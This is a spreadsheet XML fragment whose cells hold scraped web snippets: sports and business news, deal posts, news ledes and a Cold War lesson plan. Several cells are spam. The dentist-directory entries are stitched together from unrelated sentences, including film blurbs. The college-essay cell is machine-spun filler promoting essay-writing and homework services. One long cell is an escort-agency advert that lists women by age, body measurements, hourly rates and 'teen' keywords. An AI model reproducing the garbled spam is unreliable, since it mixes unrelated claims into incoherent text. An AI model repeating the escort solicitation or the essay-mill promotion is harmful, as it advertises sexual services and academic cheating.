    <t>After gaining some rave reviews about the Brazilian from Bundesliga journalists, we’ve spoken to Hoffenheim fan @Skuggz_ following Joelinton’s big money move to Newcastle United. While he rates him highly, he warns Newcastle fans that he is ‘not the finished product at all’, suggesting we must be patient with the 22-year-old ahead of the new 2019/20 season. Here’s what he had to say when we asked for his honest assessment of our new £40m man: “He’s quick, can dribble with the ball fairly well and he has a mean shot in him. “He contributes in the build-up quite well and can play as a striker, an attacking midfielder and maybe on the wing. “His profile gets compared to Firmino as they do much of the same work, but their styles are still quite different.“ “He is still quite unproven, and not the finished product at all. “It might take time for him to flourish in PL. Not sure how well he’ll suit going from Nagelsmann to Steve Bruce’s style of play. “He might need time, and it’s also dependant on his team mates and style of play. I think he will hit 8-12 goals in PL, but that is guesswork from me. “Nahelsmann (Hoffenheim’s former manager) liked him, and so did his team mates. Is he a hard-worker who gives 110%? He doesnt have the work rate of someone like Firmino for example, but I would say his work rate is very good. “Seeing as he’s not the finished product there’s definitely a risk. I’ve been vocal about the fee and said that Hoffenheim got a very good price for him (£40m) after just one good year in the Bundesliga, but £40m is worth far less for Newcastle than it is for Hoffenheim, so it could potentially be a good deal for all parties. “Physically he’ll be fine in Premier League. Mentally I don’t know, but I’m sure he’ll do fine if 1) he’s given time to adapt, 2) he suits Steve Bruce’s philosophy, and 3) he has adequate players around him.“ An intriguing assessment. It seems he’s clearly got talent, but I get the feeling we’ve bought huge potential here and by no means the finished product. I’m excited to see how he gets on, but also cautious of the fact he’s still only had one good season in one of Europe’s top leagues to date, combined with the fact our play under Steve Bruce may not be nearly as free flowing and expansive as he was used to during his time under Nagelsmann at Hoffenheim. Let’s hope he settles in, starts well and delivers the good – although the clear message here seems to be ‘he’s good, but don’t expect too much too soon’. (Fancy writing for us? Send any articles/ideas over to us at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>theearth</t>
  </si>
  <si>
    <t>Original Coupon Deal Hi 2 day sale from SCA. Even cheaper than this deal and no club plus membership is required SCA Microfibre Cloths - 2 Pack $1.70 (Save $7.99) @ Supercheap Auto eBay [C&amp;C] Have a nice day. SCA Microfibre Interior Detailing Cloths - 2 Pack Lint Free Super soft microfibre Use wet or dry Size: 40cm x 40cm SCA Microfibre Glass Cloths - 40cm X 40cm, 2 Pack 40cm x 40cm Soft &amp; Smooth Microfibre Streak &amp; Lint free finish SCA Microfibre Buffing Cloths - 2 pack Super soft microfibre Gently removes wax &amp; polish Streak free finish Size: 40cm x 40cm Link to SCA store($2.00)just in case sold out on eBay store</t>
  </si>
  <si>
    <t>Lance Stroll said it was an encouraging day at the Hockenheimring on Friday, with the Racing Point F1 Team racer placing inside the top ten in both free practice sessions at the German circuit. Stroll, who is still looking to escape Q1 in Qualifying for the first time since joining Racing Point, finished ninth fastest in the morning session before moving up to seventh in the afternoon, with the recent updates made to the RP19 seemingly giving the Canadian a feeling of progress. “I felt happy with the car,” said Stroll. “It is early days, but it looks like we have made a step forward with the upgrade. You can see the car looks quite different and it’s encouraging to be in the top ten for both sessions. “It’s only Friday, though, and there is lots of work to be done to carry this performance through until Sunday. Track temperatures were very hot, but looking at the forecast we could see a big change for the weekend.” Team-mate Sergio Pérez, who has failed to score points in any of the previous six Grand Prix, missed out on the top ten in the morning session after ending eleventh fastest, but joined Stroll inside the top ten in the afternoon. The Mexican agrees with the Canadian that the new package direction has more potential than the previous set-up, and although it is only Friday, there seems to be an improved level of competitiveness from the Silverstone-based team this weekend. “A good day, I have to say,” admitted Pérez. “I was testing the new package, the same as my team-mate. It’s hard to compare with the old parts – especially with such high temperatures today – but it definitely feels like an improvement. “The car feels better and I think this direction has more potential. We’re still struggling a little bit with the balance, so it was tricky at times and we have some work to do on that tonight – but generally we can be pleased with the level of competitiveness. “I’m always careful not to draw conclusions from just one day, so let’s see what happens in qualifying.” Otmar Szafnauer, the CEO and Team Principal of Racing Point, praised the mechanics and engineers for fast-tracking the new aerodynamic parts for the RP19, some of which only arrived at track hours before action began on Friday morning. “A busy Friday evaluating the new bodywork,” said Szafnauer. “We had parts on the car that only arrived this morning and more things coming overnight, and I want to give credit to everybody in the team who has worked hard to fast-track these changes. “Initial feedback from the drivers is positive and the data backs this up.” Szafnauer believes the predicted weather on Saturday could spice up the Qualifying hour, but he knows Racing Point need to remain focused to ensure they get the best out of their package regardless of whether it rains or not on Saturday. “There is a big question mark over the weather tomorrow with rain showers predicted, which would make for an interesting qualifying hour,” said Szafnauer. “Either way, we expect cooler conditions than we’ve seen today.”</t>
  </si>
  <si>
    <t>A civil Supreme Court trial involving Geelong College and a former victim of child sex abuse is set to begin in the Supreme Court on Monday.</t>
  </si>
  <si>
    <t>For the 30-year anniversary of Let Your Backbone Slide, Maestro Fresh Wes, his former manager Farley Flex and Davis from the production duo First Offence reflect on the song's impact, for an oral history of Let Your Backbone Slide.</t>
  </si>
  <si>
    <t>How Dental Implants Improve a Person’s Smile and Sense of Wellbeing – The requirement of which one a patient requires is best arrived at in a consultation with their dentist. It is the benefits of dental. Richmond Hill, Toronto and Vaughan. Reviews on Dentist Reviews in Vaughan, ON – Rosedale Family Dental Centre, Marketplace Dentistry, Vellore Corners Dentistry, BC Dental Care, Woodbridge Dental Centre, Dentistry On Thornhill Woods, Dr. Gina Ha &amp; Associates, Mackenzie Dental Centre, The Best Dentists in Vaughan Handpicked Top 3 Dentists in Vaughan, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. You. Cosmetic Dental Clinic In Vaughan Ontario Cosmetic Dentist In Vaughan Cosmetic Dentistry Vaughan At the Mackenzie Dental Centre, Dr. Lloyd Pedvis offers cosmetic dentistry in Maple, Woodbridge, and Vaughan to meet the needs of each patient. The Mackenzie team is highly skilled and professional, employing state-of-the-art. Top-rated cosmetic dentists in Vaughan! Book your ***FREE Virtual Consultation*** with one of our cosmetic Quentin Tarantino to curate a series of films for the Sony Movie Channel – When Ed’s temper results in the death of an innocent Native American, Lee tries his best to cover his son’s tracks by making. Most Popular Dentist In Vaughan Dentists in Vaughan ON (3432 Result(s)) Relevance Closest Highest rated Most reviewed Alphabetical Recently Reviewed Filters. Most Popular Open now 24/7 Online Messaging Editor's Picks Categories Orthodontists Whitening Prosthodontists Emergency. Award-Winning Private Fulham Dentist, Progressive Dentistry Offers Quality Dentistry Services Using State of the Art Technology – Progressive Dentistry in Fulham, London, offers residents top After returning to Los Angeles from a group therapy session, documentary filmmaker Bob Sanders (Robert Culp) and his wife, Carol (Natalie Wood), find themselves becoming vigilante couples counsellors, Cityview Smiles Dental Centre, one of the best clinics for Vaughan dental care, houses Vaughan dentist Dr. Genna Gelfland. Dr. Gelfland specializes in comprehensive dental hygiene, focusing on preventative therapies, restorative work and gum health while taking. Search or browse RateMDs for trusted reviews &amp; ratings on Dentists in Vaughan. We're the original doctor ratings site with over 2 million reviews. What is a Dentist? Dentists are medical specialists who provide advanced medical treatment and care of teeth and.</t>
  </si>
  <si>
    <t>Now in its 44th season of operation World Team Tennis has endured longer than most expected. The league originated by Billie Jean King in 1974 has included most of the top men’s and women’s players over the years including Connors, Borg, Sampras McEnroe and the Williams sisters Source: Sports Business News</t>
  </si>
  <si>
    <t>The QCY T2C is the successor of the popular T1C earphones featuring a charging case with lid that provides up to 32 hours of total play time and IPX4 water resistance making it suitable for workouts. Other features include True Wireless Stereo, Realtek Bluetooth 5.0 chipset, CVC 6.0 noise reduction for clearer calls with the inbuilt mic, S/M/L eartips, tap gestures including play/pause sound, skip forward/backward and voice assistant. Apply the coupon TWST2C to get it for $19.78 US (~$28.65 AU) Click Proceed to Checkout and choose Australia Direct Line to get free express shipping. AU$ based on current Mastercard rate. Other Deals: Xiaomi Huami AMAZFIT Verge Lite Sports Smartwatch $83.99 US QCY L2 BT5.0 Active Noise Cancelling Earphones $19.99 US Tronsmart Spunky Buds Pro TWS Bluetooth 5.0 Earphones w/ Charging Case $29.99 US 2.5% cashback at Cashrewards</t>
  </si>
  <si>
    <t>Watch the fourth stop of Red Bull Cliff Diving 2019 LIVE on YouTube. #redbullcliffdiving #portugal #azores #redbull Portugal’s Azores island of São Miguel hosts the fourth stop of the tour. The rocky volcanic archipelago sees the athletes dive from natural perches, with constructed platforms available for optional dives. Tune in LIVE for the best cliff […] The post REPLAY Red Bull Cliff Diving World Series 2019 | Azores, Portugal appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Welcome to escorts in Southrey LN3, covering the whole area of Lincolnshire. We have escorts serving the flats, homes and local hotels in Southrey and the surrounding Lincolnshire areas. Southrey Escort Lincolnshire Escort Services Southrey Escorts - Girls Who Know How to Fulfill You in Lincolnshire Southrey escorts are known in Lincolnshire for a wide variety of reasons. The first reason for its popularity is its beauty. The second reason is their skills when it comes to massages. When you are in the area, you will have to walk around a lot if you are a visitor and want to explore the city. After walking around this much, it is not surprising that your legs would be hurting and your body would need some pampering. You can book the services of one of these women and allow them to give you a soothing massage. If you want, you can even enjoy an erotic massage. Elite Southrey escorts are the women who would not stop at anything when it comes to your entertainment. These women are very naughty, and they have a list of naughty, sexy and kinky games that they would like to play for you! You can prolong the excitement by beginning your day exploring the outdoor markets, the antique stores and sit at some of the cafes. These girls love to have fun, and you should not be surprised if you see her playing footsie with you under the table when you are sitting at a restaurant or a café! You will find it extremely easy to get in touch with these escorts if you go through an agency. If you want, you can even book their services before you reach the city so that you have a companion ready for you when you land in Southrey. Best escort in Southrey will even be willing to join you on a trip, and that would be a great way to stay entertained even when you are traveling. You would love how these women fill up your days and night with excitement and passion and suddenly, mixing business with pleasure will not be so bad! Escort Name: Gillian Location: Southrey (LN3 5) Nationality: English Spoken Language: English, French Age: 28 years old Weight: 63.6kg (140lb) (10st - 0lb) Height: 5 feet 8 inches (172.72cm) Dress Size: M Shoe Size: 39 Hair Leigh: Long Hair Color: Blonde Eye Color: Gray Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: No Piercings: No Smoking: No Drinking: Occasionally Availability Area: Southrey Outcall: Lincolnshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Gillian Escort Name: Opal Location: Southrey (LN3 5) Nationality: English Spoken Language: English, Latvian Age: 20 years old Weight: 59.5kg (131lb) (9st - 5lb) Height: 5 feet 10 inches (177.80cm) Dress Size: L Shoe Size: 42 Hair Leigh: Medium-Length Hair Color: Blonde Eye Color: Blue Breast: Natural Breast Size: G Pubic Hair: Trimmed Tattooed: No Piercings: Yes Smoking: No Drinking: No Availability Area: Southrey Outcall: Lincolnshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Opal Escort Name: Willa Location: Southrey (LN3 5) Nationality: Argentine Spoken Language: English, Polish Age: 22 years old Weight: 55.0kg (121lb) (8st - 9lb) Height: 5 feet 9 inches (175.26cm) Dress Size: XXL Shoe Size: 37 Hair Leigh: Short Hair Color: Nude Blonde Eye Color: Brown Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: Occasionally Drinking: Occasionally Availability Area: Southrey Outcall: Lincolnshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Willa Escort Name: Dixie Location: Southrey (LN3 5) Nationality: Swedish Spoken Language: English, Czech Age: 27 years old Weight: 60.0kg (132lb) (9st - 6lb) Height: 5 feet 7 inches (170.18cm) Dress Size: S Shoe Size: 41 Hair Leigh: Long Hair Color: Bronde Eye Color: Red Breast: Natural Breast Size: B Pubic Hair: Trimmed Tattooed: No Piercings: No Smoking: No Drinking: Occasionally Availability Area: Southrey Outcall: Lincolnshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Dixie Escort Name: Sophia Location: Southrey (LN3 5) Nationality: British Spoken Language: English, Spanish Age: 24 years old Weight: 49.5kg (109lb) (7st - 11lb) Height: 5 feet 10 inches (177.80cm) Dress Size: S Shoe Size: 45 Hair Leigh: Short Hair Color: Black Eye Color: Red Breast: Natural Breast Size: B Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: Occasionally Drinking: Occasionally Availability Area: Southrey Outcall: Lincolnshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Sophia Escort Name: Bambi Location: Southrey (LN3 5) Nationality: Turkish Spoken Language: English, German Age: 28 years old Weight: 59.1kg (130lb) (9st - 4lb) Height: 5 feet 7 inches (170.18cm) Dress Size: L Shoe Size: 40 Hair Leigh: Medium-Length Hair Color: Blonde Eye Color: Violet Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: Yes Smoking: No Drinking: Occasionally Availability Area: Southrey Outcall: Lincolnshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Bambi Escort Name: Clementine Location: Southrey (LN3 5) Nationality: Welsh Spoken Language: English, Bulgarian Age: 21 years old Weight: 51.8kg (114lb) (8st - 2lb) Height: 6 feet 2 inches (187.96cm) Dress Size: M Shoe Size: 37 Hair Leigh: Very Long Hair Color: Black Eye Color: Gray Breast: Natural Breast Size: B Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: No Drinking: No Availability Area: Southrey Outcall: Lincolnshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Clementine Southrey Best Escort, Southrey Incall Escort, Southrey Brunette Escort, Southrey Cheap Escort, Southrey Teen Escort, Southrey French Escort, Southrey Agency Escort, Southrey Asian Escort, Southrey Scottish Escort, Southrey Female Escort, Southrey Gay Escort, Southrey Massage Escort, Southrey Brazilian Escort, Southrey Outcall Escort, Southrey Bisexual Escort, Southrey Ebony Escort, Southrey Young Escort, Southrey Blonde Escort, Southrey Indian Escort, Southrey Polish Escort, Southrey Male Escort, Southrey British Escort, Southrey Horny Escort, Southrey Busty Escort, Southrey Irish Escort, Southrey Chinese Escort, Southrey Black Escort, Southrey Mature Escort, Southrey Spanish Escort, Southrey Walsh Escort, Southrey Erotic Escort, Southrey Porn Escort, Southrey Indian Escort, Southrey Independent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Southrey appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>SOPHIE, COUNTESS OF WESSEX, 54, has been a member of the Royal Family for 20 years, while Meghan Markle 37, officially joined “The Firm” last year when she married Prince Harry. But are the Queen’s in-laws friends? Daily Express :: Life and Style Feed Are Sophie Countess of Wessex and Meghan Markle friends? Royals share THIS special bond</t>
  </si>
  <si>
    <t>A Queensland retirement home – which left about 70 elderly patients homeless in the wake of its abrupt closure – faced sanctions dating back to 2007, according to a letter tabled in the Senate.</t>
  </si>
  <si>
    <t>Juventus Offered To Give Notts County A Kit In Brilliant Gesture Juventus offered to help Notts County secure new shirts for next season but the National League outfit have had to turn down the wonderful gesture. On Thursday we told you that because of the Magpies’ financial struggles, they are currently wearing kits from last season as they cannot yet afford to pay for their new Puma-developed designs. Local MP Lilian Greenwood, 53, wrote to the Serie A champions in the hope of returning a favour from 1903.The Bianconeri, specifically Juventus chairman Andrea Agnelli, were happy to oblige in the arrangement of new kits through their partner Adidas. However, County’s existing two-year deal with Puma complicated proceedings and they had to decline. What a fantastic gesture by the #Juventus president to buy #Notts County their kit for the season. Unfortunately with them being contracted to Adidas they were unable to help us as we are in a two year contract with puma. Next step has to be a pre season friendly next summer. – Shorey :flag_dk: (@NCFCshorey) July 27, 2019 Nottinghamshire Live released the following letter from Claudio Albanese, who works for Juventus as head of communications, “Considering the long-lasting relation between the two clubs, Juventus would have gladly assisted in providing new kits for next season. “We have already held talks with our technical sponsor, Adidas, to inform them of the situation and they immediately contacted Notts County to arrange equipment supply. “Unfortunately, as it turns out, the club has a two-year binding agreement with Puma that doesn’t allow them wear any other brand. Thank you for the letter. We wish Notts County all the best for the future.” Juventus and Notts have a deep 116-year connection that stems from Juventus asking their English player Tom Savage about sourcing a new kit by contacting some of his friends back in the UK. Savage was able to secured Notts County’s shirts featuring black and white stripes and the Old Lady adopted those colours in their home kits ever since. TOGETHER :black_circle::white_circle:#NottsCounty #Juventus pic.twitter.com/NItH1v4T9o – Italian Magpies (@ItalianMagpies) July 27, 2019 The two clubs maintain a productive relationship and Juventus asked Notts to open their new stadium with a friendly in 2011. This post Juventus Offered To Give Notts County A Kit In Brilliant Gesture appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>Netflix released the trailer for Martin Scorsese’s next film, “The Irishman.” Earlier this week, it was announced that the mob drama will debut at this year’s New York Film Festival. Based on the book “I Heard You Paint Houses,” the movie offers a look inside the life of WWII veteran-turned-hitman Frank Sheeran as he remembers […] Variety The post Martin Scorsese’s ‘The Irishman’ Trailer Teams Robert De Niro, Al Pacino and Joe Pesci appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>OPP say a suspect was allegedly carrying around a purse belonging to the owner of the reported stolen vehicle.</t>
  </si>
  <si>
    <t>The authorities suspend classes nationwide amid unrest over the killing of four student protesters. The post Sudan suspends schools after student killings appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Julie Power</t>
  </si>
  <si>
    <t>130 crash tests have found older drivers using cushions and other "comfort accessories" are potentially at increased risk of injury and death in a car crash.</t>
  </si>
  <si>
    <t>OPINION Newcastle United have unveiled their new third kit for the upcoming season and there are a lot of fans on Twitter who are saying pretty much the same thing – it looks like a Wolves kit. It’s Orange and has a dark coloured trim, so naturally it’s the kind of the kit that you would expect to see Nuno Espirito Santo’s men playing in next term. Looking like Wolves doesn&amp; Source</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Hamas says man gunned down in Malaysia was important member Friday 19 July 2019 11:43 PM UTC-05 https://m.youtube.com/watch?v=odoknaCLlrc The Hamas militant group says a man who was gunned down in Malaysia was one of its members who had made important contributions in science.</t>
  </si>
  <si>
    <t>submitted by /u/TehBossN1NjA [link] [comments] Apple Pay transaction volume and new user growth outpacing PayPal, Tim Cook says — 9to5Mac</t>
  </si>
  <si>
    <t>UFC president Dana White will be in attendance at tonight’s Thursday Night Football contest between the Edmonton Eskimos and Toronto Argonauts at Commonwealth Stadium. The man himself! @UFC_CA President Dana White will do the coin toss tonight ahead of #UFC240! : https://t.co/bNyg4SeDKK pic.twitter.com/2hcf8ODkyG — Edmonton Eskimos (@EdmontonEsks) July 25, 2019 White is in town to promote Saturday’s UFC 240 card at Rogers Place; the main event features reigning UFC Featherweight Champion Max Holloway and challenger Frankie Edgar. Tickets to Thursday’s Esks game can be purchased here.</t>
  </si>
  <si>
    <t>BBC Breakfast returned to television screens this morning as Dan Walker and Louise Minchin sat on the red sofa to present the show. Following a weather update with Carol Kirkwood who was live from Blenheim Palace, Dan and Louise were joined by Steph McGovern in the studio and conversation quickly turned to whether or not she was finding her pregnancy difficult because of the heat. But it wasn’t long before the business reporter got carried away, forgetting she was on live television. “Thank you very much Carol,” Dan said crossing back. “It really does look lovely there this morning. I know it’s going to be hot…” “Yes,” his co-presenter Louise interjected.”Steph’s here. How are you doing in the heat?” “Do you know, I have had a fan on for about two months,” Steph replied. “It’s making such a difference. Do you know what? To begin with the noise was annoying me, but now I find I get to sleep much more easily, so I’m alright at the minute so I’ve been prepared for some time.” “I remember when I was very heavily pregnant during a heatwave like this and I just had a bucket of water by the bed and every now and then I would just put my feet in in a bucket of water,” Louise reminisced fondly. “Our sleep expert was saying, get your feet cold and it regulates your temperature,” Dan added. But Steph wasn’t convinced by the idea: “I don’t like to have my feet out though! I always think someone is going to come and get them! I totally do, I know that’s bad but I have mad nightmares and things and think someone is going to have a nibble of them or…” Dan then enquired about his colleague’s wellbeing, asking: “Are you taking extra precautions this week with the heat?” Read More: BBC News: Charlie Stayt shuts down co-host over bizarre request “Yes well, I’m doing alright with the fan actually but I’m not taking any extra, but I’m taking on board what’s been said. I also think if you put your feet in a bucket water, won’t that make you wee yourself or something?” She laughed. Shocked by her statement, Louise exclaimed: “Not in my experience!” as Dan remarked: “All this to think about.” Attempting to change topic, Louise said: “You’re not here to talk about that but thank you for all those thoughts.” “Sorry!” Steph exclaimed directly to viewers watching at home. “Too much personal information, sorry everyone.” The camera then panned to a wide angle and Dan was seen chuckling before he added: “You forgot we were on television for a minute!” “I know I did actually,” Steph admitted before shrugging off the exchange. It comes after yesterday’s show when Dan Walker interviewed Conservative MP Dominic Raab. Today, the nation will find out who the new leader of the Tory party is going to be when the outcome of the leadership race is revealed. And during Monday’s show, BBC One viewers tuned in to see Dan make a dig at the progress of Brexit and how long it has take for Britain to leave Brussels. BBC Breakfast airs everyday at 6am on BBC One. Source link</t>
  </si>
  <si>
    <t>Viva Vitality: How dental sealants can help those areas brushing and flossing can’t get to – Alberta Child Health Benefits is for families with limited income that may not have insurance or money to go to the dentist or other medical providers. For more information please visit employment. Looking for the best local places in Medicine Hat, AB? Click Here Children dentists in Medicine Hat Cosmetic dentists in Medicine Hat Dermatologists in Medicine Hat. At Park Meadows Dental in Medicine Hat, Alberta we help you get a beautiful smile that turns heads. Emergencies are seen same day. All services provided under one roof. If you have a dental phobia, we can provide sedation options or laughing gasto ease your. Dentist in Medicine Hat Cosmetic Services At River Dental, we can help restore your smile to deliver natural, healthy looking results. Our Medicine Hat, Alberta office serves residents of Medicine Hat, Redcliff, Dunmore, Irvine, Elkwater, Oyen, Bow Island. Best Dentist In Medicine Hat The Best Dentists in Medicine Hat, AB What is a Dentist? Dr. David Stock Verified Outstanding Staff World Class Punctuality Exceptionally Helpful Highly Knowledgeable. Medicine Hat Dentists at Courtyard Dental Centre are dedicated to family dentistry such as Exams, Teeth Whitening, Veneers and more. We are looking forward to your visit to our. Viva Vitality: Medicine Hat Dentists at Courtyard Dental Centre are dedicated to family dentistry such as Exams, Teeth Whitening, Veneers and more. We are looking forward to your visit to our. Best Dentists in Medicine Hat, AB – Courtyard Dental Centre, Crestwood Dental Clinic, Southside Dental, Sun City Dental, Dr. Brenda Krasko Family Dental, River Dental, Grover Dental Centre, Schow Dental, Galvin Dental, Park Meadows Dental Number 1 Dentist In Medicine Hat Best Dentist In Medicine Hat The Best Dentists in Medicine Hat, AB What is a Dentist? Dr. David Stock Verified Outstanding Staff World Class Punctuality Exceptionally Helpful Highly Knowledgeable. Medicine Hat Dentists at Courtyard Dental Centre are dedicated to family dentistry such as Exams, Teeth Whitening, Veneers and more. We are looking forward to your</t>
  </si>
  <si>
    <t>A Startling Fact about College Admission Essay Uncovered Advanced vocabulary ought to be the spice of the essay to give it flavor, so you will use plain language the majority of the moment. Brainstorming is a process which forces you to provide all ideas a opportunity. Writing quality essays is the principal purpose of our services. A good thesis is something which can be argued with. Then, and solely then, must you manage the draft responses which you will ship to someone to examine. order essay uk Your assignment is being taken care of simply as you wish to pay for essays. Although each facet of your college application is crucial, a strong college admission essay is just one of the main elements of the application. Sadly, many students don’t consider their essays from the viewpoint of somebody who has never met them. If you would like to create a college essay which works, you will need to provide importance on the content you will supply the admissions officer of your intended university with. If, on the flip side, you have more than 1 idea you love, consider whether any of them may be used for different essays you have to write. Sometimes you need to submit a typed essay and other times each hand written https://uk.grademiners.com/do-my-homework one is needed. Expository essay employs formal language to talk about someone or something. The True Meaning of College Admission Essay Regardless of what college you want to enroll at, you have to compose an admission essay. Apart from having an exceptional SAT score, you would have to produce the ideal college essay. Writing a amazing college admission essay requires a lot of creativity. Searching for the very best essay templates can allow you to start up your writing endeavor. Or you are able to view 18 essays all on a single page. Writing an essay isn’t an easy endeavor to do. Just one essay submission is demanded. The entire essay has to be written in a polite tone with superior grammar and usage of vocabulary. If it doesn’t, you might want to modify your essay topic. Before you even begin writing the content of your college essay, there are a few essay writing basic guide that you always need to bear in mind. If you’re applying to a college that doesn’t accept the Common App, you will have to answer their precise essay questions. Simply speaking, learning https://www.aitsl.edu.au/docs/default-source/default-document-library/standardised-assessment-of-initial-teacher-education–environmental-scan-and-case-studies.pdf?sfvrsn=12fdec3c_0 how to compose essays properly is something which you cannot avoid. So, if you don’t figure out a means to stand out, you’ve wasted your only opportunity to achieve that. It’s not sufficient to just understand what you would like to write about you should also have a feeling of how you’re likely to write about doing it. To know what types of questions to ask yourself about what you do want in college, you may want to take a look at our article about the very first measures in selecting a college which suits you. Keep reading to find out more about how PrepScholar can help you accomplish your educational dreams. You are supplied with adequate time and you’ve got access to others’ fresh eyes also. The student does an superb job of laying out the 3 principal reasons a car carries the duty of adulthood. In fact, lots of successful small business professionals have several college degrees that apply right to their line of work. Apart from the situations that you should always remember, in addition, there are some things which you shouldn’t do when creating the content of your college essay. Don’t provide an impression that you’ve got minimal understanding about the college you’re applying to. There might be personal information which you want considered as a member of your admissions application. All institutions would like to be related to positive attributes like producing all-round students. There’s an age restriction on the strategy. If you don’t, you find it possible to actually damage your odds of admission. The admissions process is intended to think about all elements of an applicant’s academic record and individual experiences. It’s also fantastic to acquire recommendation via an advisor. Who Else Wants to Learn About College Admission Essay? You’ve got to reveal your future teachers and professors that you’re ready to perceive and adhere to the directions correctly. Last version will be ideal! Even just two or three errors, though, can be a strike towards you. Professor Mitchell obtained a grant to have a category of students to Belgium to be able to study the EU. Professional PhD Writers are here in order to give you a hand. Stephen connects his previous experience to his present maturity through self-knowledge.</t>
  </si>
  <si>
    <t>Peter Hannam</t>
  </si>
  <si>
    <t>Immediate changes are needed to avoid the "collapse" of Australia's longest river system, a NSW government agency has found.</t>
  </si>
  <si>
    <t>Pinned onto Uncategorized In Phoenix there are over 1.5 million people commuting daily to work or school. An accident can happen anywhere at any time, and an injury can change your life in seconds. Don’t despair, call Phillips Law Group for help. #PLG#Phillipslawgroup#lawyer#personalinjuryattorney#law#injuryclaim Source by phillipslawgroup</t>
  </si>
  <si>
    <t>DEEPIKA PADUKONE has revealed how she handled the lightning-fast turnaround time between her two current projects. Daily Express :: Entertainment Feed</t>
  </si>
  <si>
    <t>Russel Tarr</t>
  </si>
  <si>
    <t>The Impact of the Cold War upon the DDR The impact of the Cold War upon one state, and a comparison and contrast of the impact of the Cold War upon two states from different regions, is a possible focus of exam questions. The following unit was designed to provide an academically rigorous follow-up task to the materials we completed on our Residential Study Trip to Berlin. 1. Impact upon one state – the DDR In this first part of the unit, students work collaboratively to determine the impact of the Cold War upon the DDR. Analyse the impact of the Cold War upon the DDR Students are given 20 key terms, events, individuals and themes relating to the DDR. These are divided between the members of the class to research individually prior to a feedback session. Students then write their answers to the key question, based on their areas of study, on individual revision cards.When all 20 cards are completed, the class should work together to organise these into between three and five meaningful categories. Stick them down on a large piece of card, and link them together using arrows and topic sentences. A photograph of the completed essay framework should then be shared with all members of the class so they can effectively write an answer to the key question “What was the impact of the Cold War upon one state that you have studied?” (4 views)</t>
  </si>
  <si>
    <t>On the same day that a poll was released showing a majority of Calgarians feel the arena deal is being rushed, the city revealed it has asked the Calgary Flames’ ownership group for more time to do public consultation. CBC | Sports News</t>
  </si>
  <si>
    <t>“Operation Petticoat” is one of my favorite movies. It has some scenes that still bring a laugh today, no matter how many times I’ve seen the film. The Seaman Hornsby scenes are hilarious, but the whole sinking of a truck thing has to be the funniest to me. Thing is, that’s based on an actual event. No, I’m not gonna talk about that event, but another event that reminded me of that event. This one was on purpose: the sinking of a train. [The YouTube] So, what’s on your mind? Got something you’d like to share? It’s Wednesday Night Open Thread. Who wants to start? 0 0</t>
  </si>
  <si>
    <t>A conference in Adelaide this weekend will hear how SA is the only state not to provide a subsidy for special garments used by breast cancer sufferers.</t>
  </si>
  <si>
    <t>Taylor Braat</t>
  </si>
  <si>
    <t>A barber has taken his salon to the streets to give free haircuts to the homeless every second Sunday in Moose Jaw, Sask.</t>
  </si>
  <si>
    <t>The Ritz-Carlton, Laguna Niguel hotel in Dana Point, Southern CA is the perfect luxury vacation destination where you can create lasting memories. Perched high above the beach, the ocean front resort has reimagined the notion of luxury experiences with spa, golf and eco-adventures. Here, in Dana Point, near Laguna Beach, beautiful ocean views blend with […] The post The Ritz-Carlton, Laguna Niguel Reimagined appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>The United States Women’s Volleyball National Team will host Team USA’s FIVB Tokyo Women’s Volleyball Qualification Aug. 2-4 at the CenturyLink …</t>
  </si>
  <si>
    <t>Calgary's Business</t>
  </si>
  <si>
    <t>AltaGas Ltd. announced on Monday that it’s selling its portfolio of U.S. distributed generation assets held by its subsidiaries WGL Energy Systems Inc. and WGSW Inc., to TerraForm Power Inc., an affiliate of Brookfield Asset Management, for about $940 million. The transaction, which is expected to close in the third quarter, is subject to customary closing conditions. Randy Crawford AltaGas President and CEO “We are firmly focused on enhancing the value of our core asset footprint where we see the most attractive opportunities for long-term, stable earnings growth,” said Randy Crawford, president and chief executive officer of AltaGas, in a news release. “With today’s announcement, we are very close to achieving our 2019 asset sales target. We continue to execute against our near-term priorities, and I am confident that our 2019 funding and business plan is on track.” With this transaction, the company said it has announced or completed about $1.3 billion of its $1.5 to $2 billion asset sales program targeted for 2019. Earlier this year, the company completed the sale of its interest in the Stonewall Gas Gathering System for about $379 million. “The portfolio of U.S. distributed generation assets consists of 322 megawatts (MW) of contracted distributed generation assets located in 20 states and in the District of Columbia. Included in the portfolio are 291 MW of commercial and industrial solar comprised of both wholly owned assets and interests in tax equity partnerships, 10 MW of fuel cells and 21 MW of residential solar assets,” it said. © Calgary’s Business The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post AltaGas selling U.S. assets for $940 million appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
